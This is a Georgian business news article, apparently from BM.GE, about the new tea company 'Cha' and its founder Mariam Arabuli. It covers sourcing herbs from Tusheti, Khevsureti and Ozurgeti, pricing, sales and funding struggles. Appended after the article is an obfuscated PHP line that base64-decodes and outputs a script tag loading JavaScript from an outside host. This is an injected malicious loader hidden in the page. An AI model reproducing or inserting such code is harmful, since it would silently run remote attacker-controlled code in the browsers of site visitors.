celsiusi
ავერსი საქკაბელი

ბაზარზე ჩაის მწარმოებელი ახალი საწარმო „ჩა“ გამოჩნდა. როგორც კომპანიის დამფუძნებელი მარიამ არაბული BM.GE-სთან საუბრისას განმარტავს, ისინი ჩაისათვის ნედლეულს საქართველოს მაღალმთიანი რეგიონებიდან მოიპოვებენ.

„ოფიციალურად ბაზრის ათვისება 1-ლი დეკემბრიდან დავიწყეთ, თუმცა გასული წლის ზაფხული იმისთვის გამოვიყენეთ, რომ დავკავშირებოდით ადამიანებს თუშეთში, ხევსურეთსა და ოზურგეთში და ნედლეული შეგვეგროვებინა. მაღალმთიანი რეგიონებიდან გვყავს მომწოდებლები, რომლებიც მცენარეებს თავად კრეფენ, აგროვებენ, აშრობენ და შემდეგ თბილისში გვიგზავნიან.

ამ ეტაპზე 12 სახეობის ჩაი გვაქვს, მათგან უმრავლესობა ადგილობრივი ნედლეულით მზადდება. 9 სახეობა მცენარეულია, ასევე გვაქვს შავი და მწვანე. ერთადერთი სახეობა, რომლისთვისაც ნედლეული შემოგვაქვს კარკადის ჩაია, რომელიც ინდოეთიდანაა იმპორტირებული“, - ამბობს მარიამ არაბული.

კომპანიის დამფუძნებელი ასევე აღნიშნავს, რომ „ჩას“ მთავარი უპირატესობა ქართულ ბაზარზე ჩაის ერთჯერადი შეფუთვების წარმოებაა.

„ხშირად გვსმენია ჩაის მოყვარულებისგან, რომ მხოლოდ დასაყენებელი ჩაია კარგი და გემრიელი. ვფიქრობ, ამ შეხედულებას ვცვლით და ადამიანებს ვაჩვენებთ, რომ ერთჯერად შეფუთვაშიც შეიძლება, გემრიელი ჩაი იყოს.

ადგილობრივ ბაზარზე „ჩას“ რეალიზება ძირითადად ონლაინ ხდება, ჩვენი ფეისბუქ გვერდის საშუალებით. ასევე შეგვაქვს თბილისის მასშტაბით რამდენიმე მაღაზიასა და კვების ობიექტში. 1 ყუთის ფასი ჩვენი მომსახურებით სარგებლობის შემთხვევაში 12 ლარია“, - განმარტავს მარიამ არაბული.

ჩაის წარმოების სირთულეებზე საუბრისას არაბული აღნიშნავს, რომ კომპანიისათვის გრანტებისა და ინვესტიციების მოძიება დიდ დროსთან არის დაკავშირებული.

„ჩემთვის „ჩა“ ძალიან მნიშვნელოვანი პროექტია, რადგან აპრილში ბავშვის გაჩენის გამო სამსახურიდან წამოვედი და ახალი საქმის ძებნა დავიწყე. თუმცა დრო არ მყოფნის, ბავშვი რაც უფრო იზრდება, მით უფრო მიჭირს კომპანიაზე კონცეტრირება. მართალია, და და მეუღლე მეხმარებიან, მაგრამ ყველაფერს, ძირითადად, მარტო ვაკეთებ. ამიტომ ჯერ ვერ მოვახერხე საგრანტო კონკურსებში მონაწილეობის მიღება, მიუხედავად იმისა, რომ ინვესტიცია ძალიან გვჭირდება. თბილისში პატარა ფართი გვაქვს ნაქირავები, სადაც ჩაის ვფუთავთ და მისი გაფართოვება ძალიან მინდა“, - ამბობს მარიამ არაბული.

ცნობისთვის, „ჩას“ საწყისი ინვესტიცია 9000 ლარამდე იყო. ამ დრომდე კომპანიას 2000-მდე ყუთი ჩაი აქვს გაყიდული.

810
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");